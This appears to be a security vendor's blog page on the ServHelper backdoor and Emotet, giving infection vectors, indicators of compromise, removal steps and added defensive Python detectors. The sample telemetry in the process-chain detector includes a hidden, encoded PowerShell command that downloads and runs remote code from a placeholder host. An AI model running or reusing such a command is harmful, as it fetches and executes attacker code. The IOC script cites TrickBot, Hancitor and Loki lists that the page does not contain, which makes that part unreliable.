ServHelper is a new backdoor with a downloader variant, which first appeared in November of 2018. Named by the threat actor “TA505,” ServHelper spreads through email campaigns using a quantity-over-quality approach that has proven to work, albeit less effectively than the Emotet strategies discussed here. ServHelper seems to be largely targeted toward businesses but could change to focus on individuals in future campaigns.

How does ServHelper work

ServHelper is downloaded through Microsoft Word documents with macros. The documents often pretend to be invoices, though they may take other forms such as, but not limited to: greeting cards, complaints, or details from your bank. These documents attempt to convince the victim to enable macros in them by saying that the content cannot be viewed until macros are enabled. If the victim clicks the Enable Content button, the infected document runs code that downloads ServHelper to the computer. You can learn more about how to protect yourself here. An example is shown below:

[Image: infected Word document prompting the user to click Enable Content]

Another method employed by ServHelper is to distribute PDF files that claim you must follow the link provided to update your PDF viewer. These links instead reach out to a download server that infects anyone who visits. The end result is the same regardless of whether the victim gets the infection from a Word document or a PDF.

Once installed, ServHelper does one of two things.

  1. Establishes a remote-control session that allows the malicious actor to control the infected computer from anywhere. To accomplish this, the malware talks to a Command and Control server (C&C) from which it takes its commands. Some of the notable commands include: the ability to kill itself and remove traces of itself from the computer, the ability to copy the user’s browser profiles, and the ability to execute a command shell. This allows the attackers to gain access to your PII as well as any passwords, usernames, bank account information, and more.
  2. Drops another piece of malware known as FlawedGrace. ServHelper recently removed some of its capabilities (in this version only) to focus instead on dropping this malware. FlawedGrace acts as a remote-access Trojan providing similar functions to ServHelper.

Who is affected?

ServHelper largely targets businesses, so most of the emails are designed to look like emails you would see in your day-to-day business, such as invoices. Despite this active focus, it’s entirely possible for computers outside of a business to be infected and extorted, so protection is paramount.

Indicators of Compromise

ServHelper makes several changes that indicate whether a computer has been infected.

  1. The most noticeable one is the C:\Windows\ServHelper.dll that is dropped in the Windows folder.
  2. Unusual scheduled startup tasks are always noteworthy, and ServHelper uses them to start itself every time a victim’s computer boots.
  3. C:\PROGRAM FILES\COMMON FILES\SYSTEM\WINRESET.EXE
  4. crl.verisign[.]com/pca3[.]crl
  5. hxxp://ocsp.verisign[.]com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECcNdVyfWsO322H1CZgocHg%3D
  6. hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl[.]cab
  7. IP: 104.81.60.211
  8. IP: 104.81.60.51
  9. IP: 2.17.157.9
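The TrickBot, Hancitor, Loki and ServHelper indicator lists above share a shape: file hashes, file paths, domains and IP addresses. The example below is added here and is not SUPERAntiSpyware's code: it loads those indicators (kept in the defanged `[.]`/`hxxp` form the page uses), wildcards the sandbox username "admin" in the file paths so that a path under any user profile matches, and checks a constructed set of host observations (file inventory with hashes, DNS queries, outbound connections) against them. One caveat a practitioner will want built in: api.ipify.org and ip.anysrc.net are public "what is my IP" services, and the Verisign CRL/OCSP and windowsupdate.com entries are certificate-validation endpoints that plenty of legitimate software contacts, so a hit on those alone is rated low confidence. The observations and that confidence split are my assumptions.

```python
import re

# Indicators copied from the TrickBot, Hancitor, Loki and ServHelper lists above,
# kept in the defanged form the page uses. Paths that include the sandbox user
# "admin" are matched with the username wildcarded (see norm_path).
IOCS = {
    "md5": {"e580ca34929cf9b62e816adcebe715f2", "4d4e366b0813148f12fa1a2638c43f72",
            "500f84b83be685009c136a67690ca0c3"},
    "sha256": {"d2cc298a90c6ef939488b53ead12fd3549c3c0414733f6fdaf1762da31ea1e90",
               "76b96c8d796cfcebff34d42e65e5a4ab2770fda42ea3c259097ee068660dfcc2"},
    "path": {r"C:\Windows\ServHelper.dll",
             r"C:\PROGRAM FILES\COMMON FILES\SYSTEM\WINRESET.EXE",
             r"C:\Users\admin\AppData\Local\Temp\6.pif",
             r"C:\Users\admin\AppData\Local\Temp\6fsdFfa.com",
             r"C:\Users\admin\AppData\Local\Temp\saver.scr",
             r"C:\Users\admin\AppData\Roaming\msscsc\e690ca34929cf9b72e917adcebe816f2.exe"},
    "domain": {"felighevengna[.]com", "verrestofred[.]ru", "a.doko.moe", "api.ipify.org",
               "ip.anysrc.net", "crl.verisign[.]com", "ocsp.verisign[.]com",
               "www.download.windowsupdate.com"},
    "ip": {"81.171.7.39", "54.204.36.156", "95.169.184.23",
           "104.81.60.211", "104.81.60.51", "2.17.157.9"},
}
# Public IP-lookup services and certificate-validation endpoints are contacted by
# plenty of legitimate software too; a hit on one of these alone is weak evidence.
LOW_CONFIDENCE = {"api.ipify.org", "ip.anysrc.net", "crl.verisign.com",
                  "ocsp.verisign.com", "www.download.windowsupdate.com"}


def refang(s: str) -> str:
    return s.replace("[.]", ".").replace("hxxp", "http")


def norm_path(p: str) -> str:
    # Lower-case and wildcard the profile name so the same file under two
    # different user accounts compares equal.
    return re.sub(r"^c:\\users\\[^\\]+\\", r"c:\\users\\*\\", p.lower())


PATHS = {norm_path(p) for p in IOCS["path"]}
DOMAINS = {refang(d) for d in IOCS["domain"]}

# Constructed observations from one host: a file inventory with hashes, DNS
# queries, and outbound connections. Values are made up except where they
# repeat an indicator from the lists above.
OBSERVED = [
    {"type": "file", "path": r"C:\Users\jsmith\AppData\Local\Temp\6.pif",
     "md5": "4D4E366B0813148F12FA1A2638C43F72"},
    {"type": "file", "path": r"C:\Windows\System32\notepad.exe",
     "md5": "00000000000000000000000000000000"},
    {"type": "dns", "query": "verrestofred.ru"},
    {"type": "dns", "query": "api.ipify.org"},
    {"type": "dns", "query": "ocsp.verisign.com"},
    {"type": "conn", "dst": "104.81.60.51"},
    {"type": "conn", "dst": "10.0.0.5"},
]


def match(events) -> list:
    """(indicator type, value, confidence) for every observation on the lists."""
    hits = []
    for e in events:
        if e["type"] == "file":
            if norm_path(e["path"]) in PATHS:
                hits.append(("path", e["path"], "high"))
            for algo in ("md5", "sha256"):
                h = e.get(algo, "").lower()
                if h in IOCS[algo]:
                    hits.append((algo, h, "high"))
        elif e["type"] == "dns":
            q = refang(e["query"]).lower()
            if q in DOMAINS:
                hits.append(("domain", q, "low" if q in LOW_CONFIDENCE else "high"))
        elif e["type"] == "conn":
            if e["dst"] in IOCS["ip"]:
                hits.append(("ip", e["dst"], "high"))
    return hits


def summarize(hits) -> dict:
    return {"high": sum(1 for h in hits if h[2] == "high"),
            "low": sum(1 for h in hits if h[2] == "low")}


if __name__ == "__main__":
    hits = match(OBSERVED)
    for h in hits:
        print(h)
    print(summarize(hits))
```

A file that matches on both its path and its hash (the 6.pif entry here) is the clearest result; a low-confidence domain hit is only interesting alongside something else.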

What you can do

If you or someone you know is infected with the ServHelper malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required.  SUPERAntiSpyware is easy to install and will detect and remove ServHelper from any Windows computer.

If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech02 as the Tech ID.  Click here: https://www.superantispyware.com/technician-download.html

How to Remove ServHelper

  1. Restart the infected computer in safe mode without networking.
  2. Search through the Indicators of Compromise listed above and investigate any files/folders you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
  3. Delete files and folders that have been confirmed as malware.
  4. Repeat steps 1-3 on all other machines in the network.
  5. Restore all infected computers to normal mode only after confirming the infection is removed.

How to remove Emotet

You may have heard of the Trojan Emotet before. Since first appearing back in 2014 stealing banking information, it has evolved into a multi-faceted threat that targets everyone. It uses social engineering through emails to attempt to convince the user to open a Microsoft Word document and run its malicious macros. Even more worrisome is that once Emotet has infected a target, it attempts to take over the victim’s Microsoft Outlook desktop application. If successful, Emotet goes through all sent emails and contacts and sends out a new wave of spam emails. Only this time, the potential victims are receiving the message from a trusted email.

A campaign from Emotet over the Christmas season read like a friend sending a friendly season greeting.

Dear <name>,

You make the stars shine brighter and the winter days warmer just by being in my life. Merry Christmas to my favorite person in the world.

Merry Christmas and a wonderful New Year!

Greeting Card is attached

A lovely thing about Christmas is that it’s compulsory, like a thunderstorm, and we all go through it together. Garrison Keillor

While not limited to invoices or Christmas cards, these emails attempt to get the user to click the download link and then to open the document. In the email mentioned above the target may be fooled into thinking that the attached greeting card is legitimate.  The document actually contains a malicious macro, an embedded script. While macros were initially designed to help automate keystrokes and mouse movements, they were quickly abused by nefarious virus creators. The infection cannot run on its own as Microsoft has automatically disabled macros more than a decade ago to help stop these malicious scripts. Instead, Emotet uses a few techniques to get the user to re-enable macros. Examples can be seen below.



The picture urges the user to click the Enable Content button, implying that they cannot view the Word document until they do so. You may have already noticed that the bar itself says that macros have been disabled, and that the Enable Content button will, in fact, turn them on. The moment Enable Content is clicked the macro runs, and within seconds the machine is infected. Even worse, in most cases you will have no indication from this point forward that anything is wrong. In one test case we briefly had a command window appear:



This window lasted less than two seconds before disappearing. This attack vector is not unique to Emotet though. In fact, it has been used by a number of ransomware attacks in the past. If you ever see a document you didn’t expect to receive, you should always be extremely cautious with it and you should never enable macros without a very good reason.

How it works

Emotet is an evolving piece of malware that primarily spreads through email spam campaigns. Emotet itself does not attempt to do much harm; instead, it opens the door for other malware that pays the doorman on the way in. It achieves this using what is known as a command and control (C&C) server: Emotet requests instructions from its C&C server, which issues a new command. This command could be anything from “grab this malware sample and run it” to “tell me what passwords are stored in the user’s browser.” Emotet receives updates and new capabilities the same way, which is why, if Emotet has infected your computer or network, it should be removed as quickly as possible.

Emotet doesn’t stop at the first computer infected, though. Once it is on a network, it attempts to reach every other computer it can connect to by brute-forcing passwords. Unless strong passwords are enforced on all machines and known vulnerabilities are patched, a single Emotet installation can infect every computer on the network. Emotet is regularly updated with new exploits as they are found, so while it may not succeed at first, it will keep trying until it finds something that works.

Code

We won’t go into too much depth on the actual code itself, but a brief step-by-step walkthrough can be useful to get a better understanding on how this malware works.

1. The Word document contains a VBA script that is obfuscated so that it cannot be read at a glance. All this code does is launch a command shell (cmd.exe), which in turn launches PowerShell, Microsoft’s far more capable scripting shell.

2. Using PowerShell, the script attempts to download the core Emotet payload from one of several distribution websites, trying each in turn until a download succeeds.

3. The randomly named payload then reaches out to the main server and requests a command. The command changes with the campaign that is running: it could fetch new malware, or it could use your own email account to spread itself.
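The launch chain in steps 1 and 2 (Word spawning cmd.exe, which spawns PowerShell with an encoded download command) is exactly what a defender should hunt for in process-creation telemetry. The script below is an added example, not code from the original post: it takes Sysmon-style process-creation records (pid, parent pid, image path, command line), walks each shell process back to its parents, flags any chain that leads to an Office application, and decodes PowerShell’s -EncodedCommand argument so that download keywords hidden inside it can still be matched. The event records, process IDs and the http://example.invalid URL are constructed for illustration and are not real telemetry.

```python
"""Detect the Word -> cmd.exe -> PowerShell launch chain in process-creation logs.

Added example, not code from the original post. SAMPLE_EVENTS below is
constructed to mimic Sysmon event ID 1 records (pid/ppid/image/cmdline); the
stage-2 URL uses the reserved .invalid TLD and never resolves.
"""
import base64
import re

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "net.webclient",
                    "invoke-webrequest", "start-bitstransfer", "iwr ")
# PowerShell accepts any unambiguous prefix of -EncodedCommand: -e, -ec, -enc, ...
ENC_FLAG = re.compile(r"-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_ps(command: str) -> str:
    """Encode a command the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> str:
    """Reverse of encode_ps; raises ValueError/UnicodeDecodeError on garbage."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def expand_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload, if any, so keyword matching sees it."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        return f"{cmdline} [decoded: {decode_ps(m.group(1))}]"
    except (ValueError, UnicodeDecodeError):
        return cmdline


def _basename(event) -> str:
    return event["image"].rsplit("\\", 1)[-1].lower()


def find_office_shell_chains(events):
    """Return one finding per shell process that has an Office application among its ancestors."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if _basename(e) not in SHELL_IMAGES:
            continue
        chain, seen = [_basename(e)], set()
        parent = by_pid.get(e["ppid"])
        while parent is not None and parent["pid"] not in seen:  # stop on missing or cyclic parents
            seen.add(parent["pid"])
            chain.append(_basename(parent))
            if _basename(parent) in OFFICE_IMAGES:
                full = expand_command(e["cmdline"])
                findings.append({
                    "pid": e["pid"],
                    "chain": " <- ".join(chain),
                    "downloader": any(k in full.lower() for k in DOWNLOAD_MARKERS),
                    "cmdline": full,
                })
                break
            parent = by_pid.get(parent["ppid"])
    return findings


# Constructed sample telemetry (not real events). The encoded blob is built from
# STAGE2 so that the decoder can be checked end to end.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a/')"
HIDDEN = f"powershell -nop -w hidden -enc {encode_ps(STAGE2)}"
SAMPLE_EVENTS = [
    {"pid": 1200, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 4120, "ppid": 1200, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" /n Greeting_Card.doc'},
    {"pid": 4388, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe", "cmdline": f"cmd /c {HIDDEN}"},
    {"pid": 4402, "ppid": 4388, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": HIDDEN},
    {"pid": 5100, "ppid": 1200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},  # benign: no Office ancestor
]

if __name__ == "__main__":
    for f in find_office_shell_chains(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: {f['chain']} downloader={f['downloader']}\n  {f['cmdline']}")
```

Run stand-alone it reports the cmd.exe and powershell.exe processes under WINWORD.EXE (both marked as downloaders once the -enc blob is decoded) and stays silent about the scheduled backup script that PowerShell launched from Explorer. Matching only on the process name, without the parent chain, would flag that benign script too, which is why the ancestry walk is the important part.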

Who is affected

Many people assume that they will not be targets of malware campaigns. Emotet, though, targets everyone equally: it has the simple goal of getting on every machine it can and then getting paid to let other, more targeted malware come in behind it. If your email address has ever been sold, disclosed in a breach, or was on a friend’s email list when they got infected, then it’s possible you will receive a malicious email from them.

Indicators of infection

The main location for the executable is a folder under C:\Users\<name>\AppData\Local\ with whatever new name Emotet decides to use. One we have seen often is archivessymbol, but this will change. If you see something in this folder you don’t recognize, it’s important to run a scan.

Versions of Emotet can also drop files onto your computer in C:\Users\Public or C:\Users\<username>:

These files generally have five or six randomly generated digits in the file name, followed by .exe. They are not actually executable files but HTML documents, used to generate revenue for the attackers by simulating clicks on web advertisements.
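The two indicators above (an unfamiliar folder holding an .exe under AppData\Local, and numerically named “.exe” files in a profile root or C:\Users\Public that are really HTML) can be checked mechanically. The script below is an added example, not code from the original post: pointed at a Users directory it lists unrecognised AppData\Local folders that contain an executable, and every .exe in a profile root or Public whose name is five or six digits or whose first bytes are not the MZ header every real Windows executable starts with. The whitelist of “known” AppData\Local folders is an assumption for illustration and should be tuned to your environment; demo() builds a throwaway directory tree with constructed files so the script runs anywhere.

```python
r"""Audit the Emotet drop locations described above.

Added example, not code from the original post. Run audit_profiles(r"C:\Users")
on a live machine; demo() instead builds a constructed tree in a temp directory.
"""
import os
import re
import shutil
import tempfile

# Assumed whitelist of AppData\Local folders that are normal on a Windows machine.
KNOWN_LOCAL_DIRS = frozenset({"microsoft", "temp", "packages", "google", "programs",
                              "comms", "connecteddevicesplatform"})
NUMERIC_EXE = re.compile(r"^\d{5,6}\.exe$", re.I)


def classify_exe(path):
    """'pe' if the file starts with the MZ header, 'html' if it starts with markup, else 'other'."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(512)
    except OSError:
        return "unreadable"
    if head.startswith(b"MZ"):
        return "pe"
    if head.lstrip().lower().startswith((b"<!doctype", b"<html", b"<script")):
        return "html"
    return "other"


def audit_profiles(users_root, known_dirs=KNOWN_LOCAL_DIRS):
    """Return (category, path relative to users_root, detail) tuples for suspicious items."""
    findings = []

    def rel(p):
        return os.path.relpath(p, users_root).replace(os.sep, "/")

    for profile in sorted(os.listdir(users_root)):
        pdir = os.path.join(users_root, profile)
        if not os.path.isdir(pdir):
            continue
        # 1. Unrecognised folders directly under AppData\Local that hold an .exe
        local = os.path.join(pdir, "AppData", "Local")
        if os.path.isdir(local):
            for name in sorted(os.listdir(local)):
                sub = os.path.join(local, name)
                if not os.path.isdir(sub) or name.lower() in known_dirs:
                    continue
                exes = sorted(f for f in os.listdir(sub) if f.lower().endswith(".exe"))
                if exes:
                    findings.append(("unknown-local-dir", rel(sub), ",".join(exes)))
        # 2. .exe files in the profile root (covers C:\Users\Public as well) that are
        #    numerically named or are not real PE files
        for fname in sorted(os.listdir(pdir)):
            fpath = os.path.join(pdir, fname)
            if not (os.path.isfile(fpath) and fname.lower().endswith(".exe")):
                continue
            kind = classify_exe(fpath)
            if NUMERIC_EXE.match(fname) or kind != "pe":
                findings.append(("suspicious-exe", rel(fpath), kind))
    return findings


def _write(path, data):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)


def demo():
    """Build a constructed Users tree in a temp dir, audit it, and return the findings."""
    base = tempfile.mkdtemp()
    try:
        j = os.path.join
        _write(j(base, "alice", "AppData", "Local", "Microsoft", "OneDrive.exe"), b"MZ\x90\x00legit")
        _write(j(base, "alice", "AppData", "Local", "archivessymbol", "archivessymbol.exe"), b"MZ\x90\x00payload")
        _write(j(base, "alice", "setup.exe"), b"MZ\x90\x00installer")  # real PE, normal name: ignored
        _write(j(base, "alice", "573812.exe"), b"<html><body>ad clicker</body></html>")
        _write(j(base, "Public", "91046.exe"), b"<!DOCTYPE html><html></html>")
        return audit_profiles(base)
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for category, path, detail in demo():
        print(f"{category:18} {path}  ({detail})")
```

On the constructed tree this reports the archivessymbol folder and the two HTML files posing as executables, while the legitimately named PE under the profile root is left alone. On a real machine, treat every hit as something to investigate rather than proof of infection: the whitelist is deliberately short, and a numeric name alone is a weak signal, so the MZ check and a scan of the flagged file are what confirm it.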

What you can do


If you or someone you know is infected with the Emotet malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required.  SUPERAntiSpyware is easy to install and will detect and remove Emotet from any Windows computer.

If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech01 as the Tech ID.  Click here: https://www.superantispyware.com/technician-download.html

Emotet has also been known to spread using EternalBlue, an exploit for a vulnerability in the SMBv1 file-sharing protocol in Windows. Microsoft has issued a patch for this vulnerability (MS17-010), and applying it protects you from Emotet as well as from other malware that uses the same exploit.

HOW TO REMOVE EMOTET

  1. Restart the infected computer in safe mode without networking
  2. Search through the Indicators of infection and investigate any files or folders you do not recognize. You can scan a file with SUPERAntiSpyware or upload it to VirusTotal.com to confirm that it is malware (keep in mind that anything uploaded to VirusTotal is shared with other researchers, so do not upload documents that contain private data).
  3. Delete files and folders that have been confirmed as malware.
  4. Repeat steps 1-3 on all other machines in the network.
  5. Restore all infected computers to normal mode only after confirming the infection is removed.

It is time to leave Windows XP and Windows Vista behind

Frequently we here at SUPERAntiSpyware HQ still encounter users running Windows XP and Windows Vista, and we have one thing to say: it’s time to move on. Yes, it may have served you well and change is hard, but it is for the better. Windows XP extended support ended on April 8, 2014 and Windows Vista extended support ended on April 11, 2017. These operating systems are now end of life, unsupported by Microsoft, and no longer receive updates.

As Microsoft has stated on their website:

“An unsupported version of Windows will no longer receive software updates from Windows Update. These updates include security updates that can help protect your PC from harmful viruses, spyware, and other malicious software which can steal your personal information. Windows Update also installs the latest software updates to improve the reliability of Windows—such as new drivers for your hardware.”

On top of Microsoft no longer supporting Windows Vista and XP, many software vendors no longer support these operating systems either. The current versions of the popular web browsers Google Chrome and Mozilla Firefox no longer run on them, forcing many users onto outdated browser releases or extremely old versions of Internet Explorer, which are rife with security flaws. Not good!

We recommend that all users of these unsupported operating systems update to at least Windows 7, if not 8.1 or 10 (note that Windows 7 itself left extended support on January 14, 2020, so Windows 10 is the better target). This will ensure your data is more secure and less likely to be stolen or destroyed by hackers or malware infections.

Layerin’ Ain’t Just for Winter! Bolster Your Security With Layers of Protection


I thought spyware and viruses were the same thing?

A virus is malicious code that copies itself over and over in order to damage the data on your computer. Spyware, as we use the term, is an umbrella for a variety of threats such as Trojans, ransomware, keyloggers, tracking cookies, worms and so on that may harm your PC and/or your privacy but do not set out to destroy your computer’s data and system the way a virus does.

So you’re telling me I need an anti-virus AND an anti-spyware?

Strictly speaking, SUPERAntiSpyware© is not designed to be Anti-Virus software. We target Spyware, a focus that allows us to respond quickly to the ever-growing groups of hostile software we address, with new definitions released multiple times a day, and concentrate on the technology that targets the most common threats in the wild. There are a lot of things that are often called viruses (many trojans, worms, and so on) that SUPERAntiSpyware© will remove, but it won’t remove true viruses such as boot-sector viruses.

Security With Layers of Protection

No one security tool can catch everything out there and protect you, which is why we recommend a layered approach. If you use an anti-virus, we recommend you supplement it with SUPERAntiSpyware©, and if you use SUPERAntiSpyware© alone, consider adding an anti-virus. SUPERAntiSpyware© has been designed to be compatible with popular anti-virus applications such as McAfee, Symantec (Norton), Kaspersky, Bitdefender, ESET NOD32, AVG, Avast, Panda, Avira, and so on.